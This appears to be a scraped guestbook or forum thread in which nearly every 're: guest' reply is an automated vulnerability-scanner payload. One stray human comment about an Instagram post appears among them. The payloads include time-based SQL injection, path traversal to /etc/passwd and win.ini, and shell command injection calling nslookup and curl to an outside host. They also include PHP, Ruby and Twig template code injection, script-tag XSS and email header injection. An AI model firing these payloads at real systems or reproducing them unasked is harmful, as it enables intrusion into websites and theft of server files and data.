hBuKzebP') OR 123=(SELECT 123 FROM PG_SLEEP(15))--
re: guest
W2pIgV4R
re: guest
1*
re: guest
1*
re: guest
IEhY14Le')) OR 838=(SELECT 838 FROM PG_SLEEP(15))--
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+95-95-1=0+0+0+1
re: guest
-1 OR 3+95-95-1=0+0+0+1
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
@@xCwOb
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
WpZlBs1e'; waitfor delay '0:0:15' --
re: guest
-5 OR 17=(SELECT 17 FROM PG_SLEEP(15))--
re: guest
-5) OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: guest
-1)) OR 167=(SELECT 167 FROM PG_SLEEP(15))--
re: guest
TdCMdAYp' OR 496=(SELECT 496 FROM PG_SLEEP(15))--
re: guest
8tzHqhtZ') OR 778=(SELECT 778 FROM PG_SLEEP(15))--
re: guest
F51uGb06')) OR 439=(SELECT 439 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@C6iqb
re: guest
1BxEptFYaYO
re: guest
%0abcc:074625.67-22218.67.52006.19990.2@bxss.me
re: guest
response.write(9557121*9208826)
re: guest
to@example.com>%0d%0abcc:074625.67-22219.67.52006.19990.2@bxss.me
re: guest
'+response.write(9557121*9208826)+'
re: guest
"+response.write(9557121*9208826)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999097+9999333}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
)
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
'.gethostbyname(lc('hitfo'.'etocktdlf8bb9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(65).chr(105).chr(65).'
re: guest
!(()&&!|*|*|
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
".gethostbyname(lc("hitmj"."mkcbclnr0e3ef.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(103).chr(79)."
re: guest
^(#$!@#$)(()))******
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo mlruun$()\ hoksop\nz^xyu||a #' &echo mlruun$()\ hoksop\nz^xyu||a #|" &echo mlruun$()\ hoksop\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo cbpjha$()\ wkyldg\nz^xyu||a #' &echo cbpjha$()\ wkyldg\nz^xyu||a #|" &echo cbpjha$()\ wkyldg\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo vmxmch$()\ vmsmzm\nz^xyu||a #' |echo vmxmch$()\ vmsmzm\nz^xyu||a #|" |echo vmxmch$()\ vmsmzm\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
(nslookup hitdkmzqwpkaf23dc2.bxss.me||perl -e "gethostbyname('hitdkmzqwpkaf23dc2.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
$(nslookup hittenwzpfjdv8c58d.bxss.me||perl -e "gethostbyname('hittenwzpfjdv8c58d.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&nslookup hitobtyyqsqei58a20.bxss.me&'\"`0&nslookup hitobtyyqsqei58a20.bxss.me&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
&(nslookup hitczsvkhgzoma1ce9.bxss.me||perl -e "gethostbyname('hitczsvkhgzoma1ce9.bxss.me')")&'\"`0&(nslookup hitczsvkhgzoma1ce9.bxss.me||perl -e "gethostbyname('hitczsvkhgzoma1ce9.bxss.me')")&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
Http://bxss.me/t/fit.txt
re: guest
bxss.me/t/xss.html?%00
re: guest
|(nslookup hitftxexevuzs6e17b.bxss.me||perl -e "gethostbyname('hitftxexevuzs6e17b.bxss.me')")
re: guest
"+"A".concat(70-3).concat(22*4).concat(108).concat(87).concat(109).concat(72)+(require"socket"
Socket.gethostbyname("hitca"+"omtgicnr3fe3b.bxss.me.")[3].to_s)+"
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
`(nslookup hitrxmnffdhux4a04a.bxss.me||perl -e "gethostbyname('hitrxmnffdhux4a04a.bxss.me')")`
re: guest
'+'A'.concat(70-3).concat(22*4).concat(113).concat(74).concat(100).concat(78)+(require'socket'
Socket.gethostbyname('hitgf'+'kidtzwss81f68.bxss.me.')[3].to_s)+'
re: guest
file:///etc/passwd
re: guest
/etc/shells
re: guest
;(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")|(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")&(nslookup hitmbynorbzuva31d6.bxss.me||perl -e "gethostbyname('hitmbynorbzuva31d6.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
c:/windows/win.ini
re: guest
/WEB-INF/web.xml
re: guest
bxss.me
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
';print(md5(31337));$a='
re: guest
/../../../../../../../../../../boot.ini
re: guest
'"
re: guest
";print(md5(31337));$a="
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
<!--
re: guest
${@print(md5(31337))}
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
${@print(md5(31337))}\
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
'.print(md5(31337)).'
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+689-689-1=0+0+0+1 --
re: guest
-1 OR 3+689-689-1=0+0+0+1 --
re: guest
-1 OR 2+799-799-1=0+0+0+1
re: guest
-1 OR 3+799-799-1=0+0+0+1
re: guest
-1' OR 2+279-279-1=0+0+0+1 --
re: guest
-1' OR 3+279-279-1=0+0+0+1 --
re: guest
-1' OR 2+921-921-1=0+0+0+1 or 'oyikqFLx'='
re: guest
-1' OR 3+921-921-1=0+0+0+1 or 'oyikqFLx'='
re: guest
-1" OR 2+416-416-1=0+0+0+1 --
re: guest
-1" OR 3+416-416-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
vh9UXtK4'; waitfor delay '0:0:15' --
re: guest
-5 OR 664=(SELECT 664 FROM PG_SLEEP(15))--
re: guest
-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: guest
-1)) OR 67=(SELECT 67 FROM PG_SLEEP(15))--
re: guest
1BGPQKFYO50
re: guest
response.write(9865114*9590320)
re: guest
'+response.write(9865114*9590320)+'
re: guest
"+response.write(9865114*9590320)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999091+10000218}
re: guest
../
re: guest
redirtest.acx
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
echo qjudjj$()\ ddshpc\nz^xyu||a #' &echo qjudjj$()\ ddshpc\nz^xyu||a #|" &echo qjudjj$()\ ddshpc\nz^xyu||a #
re: guest
&echo lynpar$()\ cwuynq\nz^xyu||a #' &echo lynpar$()\ cwuynq\nz^xyu||a #|" &echo lynpar$()\ cwuynq\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitdd'.'ulqpobdvdb87e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(72).chr(106).chr(85).'
re: guest
|echo kvruga$()\ iiebxo\nz^xyu||a #' |echo kvruga$()\ iiebxo\nz^xyu||a #|" |echo kvruga$()\ iiebxo\nz^xyu||a #
re: guest
".gethostbyname(lc("hitsp"."osdehuno10a3f.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(71).chr(107).chr(75)."
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
expr 9000804995 - 930893
re: guest
gethostbyname(lc('hitct'.'actpmdto0f92e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(86).chr(116).chr(90)
re: guest
(nslookup -q=cname hitcaomxgpnsb82e2e.bxss.me||curl hitcaomxgpnsb82e2e.bxss.me))
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
$(nslookup -q=cname hitenchylpaou17d0a.bxss.me||curl hitenchylpaou17d0a.bxss.me)
re: guest
/etc/shells
re: guest
&nslookup -q=cname hitjmgxpuycrqe231e.bxss.me&'\"`0&nslookup -q=cname hitjmgxpuycrqe231e.bxss.me&`'
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
&(nslookup -q=cname hitfvagqhalqref522.bxss.me||curl hitfvagqhalqref522.bxss.me)&'\"`0&(nslookup -q=cname hitfvagqhalqref522.bxss.me||curl hitfvagqhalqref522.bxss.me)&`'
re: guest
c:/windows/win.ini
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
|(nslookup -q=cname hithxhkgxrwfn7a7f4.bxss.me||curl hithxhkgxrwfn7a7f4.bxss.me)
re: guest
bxss.me
re: guest
`(nslookup -q=cname hitqkfnozxkcz8a0d6.bxss.me||curl hitqkfnozxkcz8a0d6.bxss.me)`
re: guest
Http://bxss.me/t/fit.txt
re: guest
;(nslookup -q=cname hittjsgldskvf7539a.bxss.me||curl hittjsgldskvf7539a.bxss.me)|(nslookup -q=cname hittjsgldskvf7539a.bxss.me||curl hittjsgldskvf7539a.bxss.me)&(nslookup -q=cname hittjsgldskvf7539a.bxss.me||curl hittjsgldskvf7539a.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitmjegsvxtvh14944.bxss.me||curl${IFS}hitmjegsvxtvh14944.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hituftjpnkthd94bf9.bxss.me||curl${IFS}hituftjpnkthd94bf9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituftjpnkthd94bf9.bxss.me||curl${IFS}hituftjpnkthd94bf9.bxss.me)&`'
re: guest
'"()
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'&&sleep(27*1000)*xxnros&&'
re: guest
';print(md5(31337));$a='
re: guest
"&&sleep(27*1000)*ympfum&&"
re: guest
'||sleep(27*1000)*yoqkyj||'
re: guest
";print(md5(31337));$a="
re: guest
"||sleep(27*1000)*mbostb||"
re: guest
${@print(md5(31337))}
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
${@print(md5(31337))}\
re: guest
bxss.me/t/xss.html?%00
re: guest
'.print(md5(31337)).'
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(78).concat(99).concat(81)+(require"socket"
Socket.gethostbyname("hitev"+"qgaylsyqed654.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(118).concat(88).concat(105).concat(84)+(require'socket'
Socket.gethostbyname('hitti'+'pseqzcno4cc6a.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(119).concat(74).concat(120).concat(74)+(require'socket'
Socket.gethostbyname('hitsd'+'rbnzhkrp851f4.bxss.me.')[3].to_s)
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >kd3k(9957)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitezausplaen67079.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >kd3k(9276)</ScRiPt>
re: guest
9032105
re: guest
3STkhInG
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
p1oP8PHs'; waitfor delay '0:0:15' --
re: guest
-1 OR 744=(SELECT 744 FROM PG_SLEEP(15))--
re: guest
-1) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: guest
-1)) OR 402=(SELECT 402 FROM PG_SLEEP(15))--
re: guest
FScFI0Sy' OR 17=(SELECT 17 FROM PG_SLEEP(15))--
re: guest
upwIQQs7') OR 474=(SELECT 474 FROM PG_SLEEP(15))--
re: guest
T5txkkYH')) OR 422=(SELECT 422 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@c29iR
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
They posted it on Instagram. You can just do a Google translate of it.
re: guest
Cml81tD2
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+878-878-1=0+0+0+1
re: guest
-1 OR 3+878-878-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
xLZ49xzn'; waitfor delay '0:0:15' --
re: guest
-5 OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: guest
-5) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
re: guest
-1)) OR 604=(SELECT 604 FROM PG_SLEEP(15))--
re: guest
3msgUo2M' OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: guest
Ug7JkMvI') OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: guest
l3uoZajM')) OR 123=(SELECT 123 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@r3Rpj
re: guest
ZWG2l6qG
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+231-231-1=0+0+0+1
re: guest
-1 OR 3+231-231-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
wNN9rRjZ'; waitfor delay '0:0:15' --
re: guest
-5 OR 809=(SELECT 809 FROM PG_SLEEP(15))--
re: guest
-5) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
-1)) OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: guest
3Ru3WPfc' OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: guest
oYkuwb02') OR 756=(SELECT 756 FROM PG_SLEEP(15))--
re: guest
GyqYdIVU')) OR 549=(SELECT 549 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
